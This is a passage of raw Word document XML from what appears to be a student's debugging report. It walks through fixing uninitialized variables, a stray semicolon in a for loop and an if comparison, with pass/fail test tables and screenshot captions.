      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="630ADBE0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> number x would be equal to itself after 1 is added to it, which is impossible. In programming,</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="46481A88">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> however, t</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="734D7328">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">he first x in x = x+1 is the total sum of x+1, </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="06D7E2DC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">which has a different value from the </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="06D7E2DC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7CC6EB9B" w:rsidR="06D7E2DC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> x. As such,</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5D1F7C4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> we can officially consider both test cases to have passed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5D1F7C4F" w:rsidP="7CC6EB9B" w:rsidRDefault="5D1F7C4F" w14:paraId="7D5AC8BC" w14:textId="5B9919E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5D1F7C4F"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 w:rsidRPr="7CC6EB9B" w:rsidR="21CEE33B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The first error in this code is that, once again, the variable has not been properly initialized. This time, the </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0E779A6E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CC6EB9B" w:rsidR="0E779A6E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0E779A6E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">”  has been given a range (Equal to </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5A972333">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1, less than or equal to 5), but does not have a type to </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5A972333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7CC6EB9B" w:rsidR="5A972333">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> it. Since, given the co</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5050E2D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ntext of the code, it is intended to be a number, we will give it a type of int:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5050E2D8" w:rsidP="7CC6EB9B" w:rsidRDefault="5050E2D8" w14:paraId="771C1649" w14:textId="79226CD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5050E2D8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CC6EB9B" w:rsidR="5050E2D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5050E2D8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534E7FD7" w:rsidP="7CC6EB9B" w:rsidRDefault="534E7FD7" w14:paraId="41EAA5BF" w14:textId="573E9F8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534E7FD7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>We will now test out the code with the new addition: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7CB424EC">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="534E7FD7" w:rsidP="7CC6EB9B" w:rsidRDefault="534E7FD7" w14:paraId="2B51DEA8" w14:textId="7FA5014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34E7FD7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#:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="168B2D7A" w:rsidP="7CC6EB9B" w:rsidRDefault="168B2D7A" w14:paraId="2075C139" w14:textId="2EB2605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168B2D7A" w:rsidP="7CC6EB9B" w:rsidRDefault="168B2D7A" w14:paraId="66F27A20" w14:textId="225FF48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Results:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="168B2D7A" w:rsidP="7CC6EB9B" w:rsidRDefault="168B2D7A" w14:paraId="0D82E41E" w14:textId="3A1FAE6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Results:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="168B2D7A" w:rsidP="7CC6EB9B" w:rsidRDefault="168B2D7A" w14:paraId="65816F1E" w14:textId="6EB6696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042094C0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57DF6780" w14:textId="68790734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168B2D7A" w:rsidP="7CC6EB9B" w:rsidRDefault="168B2D7A" w14:paraId="034C5763" w14:textId="140AE80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 </w:t>
            </w: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</w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="168B2D7A" w:rsidP="7CC6EB9B" w:rsidRDefault="168B2D7A" w14:paraId="5D1A770C" w14:textId="0451AA0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1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="168B2D7A" w:rsidP="7CC6EB9B" w:rsidRDefault="168B2D7A" w14:paraId="0BFA6D0C" w14:textId="14651BC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2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="168B2D7A" w:rsidP="7CC6EB9B" w:rsidRDefault="168B2D7A" w14:paraId="3119A7D6" w14:textId="486DC40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3</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="168B2D7A" w:rsidP="7CC6EB9B" w:rsidRDefault="168B2D7A" w14:paraId="7A80D3BC" w14:textId="1AC6B10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4</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="168B2D7A" w:rsidP="7CC6EB9B" w:rsidRDefault="168B2D7A" w14:paraId="3E257BD5" w14:textId="38AEE17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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="168B2D7A" w:rsidP="7CC6EB9B" w:rsidRDefault="168B2D7A" w14:paraId="508619DC" w14:textId="548B0D7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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="168B2D7A" w:rsidP="7CC6EB9B" w:rsidRDefault="168B2D7A" w14:paraId="1AA04EE8" w14:textId="116E138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68B2D7A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="7CC6EB9B" w:rsidP="7CC6EB9B" w:rsidRDefault="7CC6EB9B" w14:paraId="2D995A19" w14:textId="274BECD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68B2D7A" w:rsidP="7CC6EB9B" w:rsidRDefault="168B2D7A" w14:paraId="7364E1A2" w14:textId="4C0CE67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68B2D7A">
        <w:drawing>
          <wp:inline wp14:editId="443C2CB1" wp14:anchorId="28E5A0F3">
            <wp:extent cx="4692892" cy="2330570"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="67186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4ceb39ca7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B2D7A" w:rsidP="7CC6EB9B" w:rsidRDefault="168B2D7A" w14:paraId="6C2B57DD" w14:textId="1F4DF79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168B2D7A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 6: Code B Test Case 1 Screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="168B2D7A" w:rsidP="7CC6EB9B" w:rsidRDefault="168B2D7A" w14:paraId="1E852AD7" w14:textId="297C66C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168B2D7A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The above error resu</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="1CF389B3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lts from a simple</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2C3FDC81">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> unwanted addition in the code. As one can see, line 7 includes a semicolon </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0D88E0CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">right before the bracket for the “for” loop opens. </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="3E140F7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This interrupts the normal “for” loop </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="3E140F7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>process, and</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="3E140F7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> causes the sy</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="61A826B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>stem to see it as a separate entry, assuming we want the number incremented</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="501E349E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> only once. </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="1DE7E93F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>After removing the semicolon, we received the following test results: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708FB762">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="1DE7E93F" w:rsidP="7CC6EB9B" w:rsidRDefault="1DE7E93F" w14:paraId="0463C1C5" w14:textId="5F76DC5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DE7E93F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#:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="1DE7E93F" w:rsidP="7CC6EB9B" w:rsidRDefault="1DE7E93F" w14:paraId="32677A30" w14:textId="4B789C3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DE7E93F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Input/Modification:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="1DE7E93F" w:rsidP="7CC6EB9B" w:rsidRDefault="1DE7E93F" w14:paraId="2AB11B9B" w14:textId="6340349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DE7E93F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Result:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="1DE7E93F" w:rsidP="7CC6EB9B" w:rsidRDefault="1DE7E93F" w14:paraId="2EE077E5" w14:textId="66165A9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DE7E93F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Result:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="1DE7E93F" w:rsidP="7CC6EB9B" w:rsidRDefault="1DE7E93F" w14:paraId="17012827" w14:textId="07D7143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DE7E93F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166EBC12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32F91116" w14:textId="43EDF930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8B8D4DA" w:rsidP="7CC6EB9B" w:rsidRDefault="48B8D4DA" w14:paraId="7E5E8DB7" w14:textId="5F32138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Removal of semicolon in “for” loop.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="48B8D4DA" w:rsidP="7CC6EB9B" w:rsidRDefault="48B8D4DA" w14:paraId="5CC0E5B3" w14:textId="06FA2E7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1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="48B8D4DA" w:rsidP="7CC6EB9B" w:rsidRDefault="48B8D4DA" w14:paraId="68026196" w14:textId="36CFF3A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2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="48B8D4DA" w:rsidP="7CC6EB9B" w:rsidRDefault="48B8D4DA" w14:paraId="7E693C0E" w14:textId="4555ABB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3</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="48B8D4DA" w:rsidP="7CC6EB9B" w:rsidRDefault="48B8D4DA" w14:paraId="61C841B1" w14:textId="3B47FFF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4</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="48B8D4DA" w:rsidP="7CC6EB9B" w:rsidRDefault="48B8D4DA" w14:paraId="6C990440" w14:textId="2682866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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="48B8D4DA" w:rsidP="7CC6EB9B" w:rsidRDefault="48B8D4DA" w14:paraId="797D7EE0" w14:textId="4E8B332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1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="48B8D4DA" w:rsidP="7CC6EB9B" w:rsidRDefault="48B8D4DA" w14:paraId="77232A29" w14:textId="6FE4521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2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="48B8D4DA" w:rsidP="7CC6EB9B" w:rsidRDefault="48B8D4DA" w14:paraId="36278987" w14:textId="6B6AC85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Number is 3</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="48B8D4DA" w:rsidP="7CC6EB9B" w:rsidRDefault="48B8D4DA" w14:paraId="1B6DF13A" w14:textId="791EB6B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r w:rsidRPr="7CC6EB9B" w:rsidR="06F7ACA2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ber</w:t>
            </w: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4</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="48B8D4DA" w:rsidP="7CC6EB9B" w:rsidRDefault="48B8D4DA" w14:paraId="4DB6F69D" w14:textId="3920E31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r w:rsidRPr="7CC6EB9B" w:rsidR="17DBB406">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ber</w:t>
            </w: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5</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="7CC6EB9B" w:rsidP="7CC6EB9B" w:rsidRDefault="7CC6EB9B" w14:paraId="06F3FB29" w14:textId="50DD1B6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8B8D4DA" w:rsidP="7CC6EB9B" w:rsidRDefault="48B8D4DA" w14:paraId="5A31DAD4" w14:textId="0F04F7A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8B8D4DA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</w:tbl>
    <w:p w:rsidR="7CC6EB9B" w:rsidP="7CC6EB9B" w:rsidRDefault="7CC6EB9B" w14:paraId="76561714" w14:textId="53B53BF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B8D4DA" w:rsidP="7CC6EB9B" w:rsidRDefault="48B8D4DA" w14:paraId="43C872E7" w14:textId="419DCB4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8B8D4DA">
        <w:drawing>
          <wp:inline wp14:editId="4A6F1B9B" wp14:anchorId="2916E677">
            <wp:extent cx="5943600" cy="3990975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073267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4eea3f5d7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8D4DA" w:rsidP="7CC6EB9B" w:rsidRDefault="48B8D4DA" w14:paraId="6625263D" w14:textId="2269DE0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8B8D4DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 7: Code B Test Case 2 Screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="48B8D4DA" w:rsidP="7CC6EB9B" w:rsidRDefault="48B8D4DA" w14:paraId="4FA37F25" w14:textId="5238B2D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7E6F3BE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The test proved that, after the removal of the semicolon, </w:t>
      </w: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 xml:space="preserve">the program works as intended, incrementing </w:t>
      </w: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>i</w:t>
      </w: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 xml:space="preserve"> all the way up to 5.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="49E5E8DE" w:rsidP="7CC6EB9B" w:rsidRDefault="49E5E8DE" w14:paraId="0D618E32" w14:textId="3BFB394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 xml:space="preserve">C. This code has </w:t>
      </w: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>perhaps the</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="49E5E8DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> easiest fix of all the examples. It has an if loop </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="65363811">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>meant to display a message if one variable is greater than the other, yet it gives neither variable a value</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="1B355CB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, making a comparison impossible</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="6536381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CC6EB9B" w:rsidR="587197D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">To fix the code, we will simply give z a value of 10, and d a value of 7. </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="77CFCCBA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>For the second test case, the values will be reversed</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="158B6DBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, and, for the third, both set to 10</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="77CFCCB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CC6EB9B" w:rsidR="63C1338B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Both variables will be given a type of int. </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="587197D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The additions can be seen in the te</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="10D43913">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>st case screenshots.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16D9CBA4">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="139A1CCA" w:rsidP="7CC6EB9B" w:rsidRDefault="139A1CCA" w14:paraId="532C014A" w14:textId="0B19344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39A1CCA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872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="139A1CCA" w:rsidP="7CC6EB9B" w:rsidRDefault="139A1CCA" w14:paraId="101C18E7" w14:textId="1EE54BC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39A1CCA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139A1CCA" w:rsidP="7CC6EB9B" w:rsidRDefault="139A1CCA" w14:paraId="02362FC0" w14:textId="64B37A8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39A1CCA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Result:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="139A1CCA" w:rsidP="7CC6EB9B" w:rsidRDefault="139A1CCA" w14:paraId="3C8824C5" w14:textId="14E4ED4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39A1CCA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Result:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="139A1CCA" w:rsidP="7CC6EB9B" w:rsidRDefault="139A1CCA" w14:paraId="6CD45FA4" w14:textId="5418D3A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39A1CCA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60D04953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2CAC5CFA" w14:textId="6D57AC1B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47E471A" w:rsidP="7CC6EB9B" w:rsidRDefault="547E471A" w14:paraId="0787FCA1" w14:textId="089FBFF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47E471A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Z=10</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="547E471A" w:rsidP="7CC6EB9B" w:rsidRDefault="547E471A" w14:paraId="6ABA7655" w14:textId="5D0B4EE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47E471A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>D=7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="547E471A" w:rsidP="7CC6EB9B" w:rsidRDefault="547E471A" w14:paraId="0D155296" w14:textId="1AFB910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47E471A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547E471A" w:rsidP="7CC6EB9B" w:rsidRDefault="547E471A" w14:paraId="26D01683" w14:textId="31D9577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47E471A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6E971E3B" w:rsidP="7CC6EB9B" w:rsidRDefault="6E971E3B" w14:paraId="1FAC3669" w14:textId="23528FC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6E971E3B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7CC6EB9B" w:rsidTr="7CC6EB9B" w14:paraId="436B4430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38D8160D" w14:textId="0F3EA6E9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7DFBE43" w:rsidP="7CC6EB9B" w:rsidRDefault="47DFBE43" w14:paraId="1B1313C0" w14:textId="25FDEDB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7DFBE43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Z=7</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="47DFBE43" w:rsidP="7CC6EB9B" w:rsidRDefault="47DFBE43" w14:paraId="673528D9" w14:textId="037D13D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7DFBE43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>D=10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
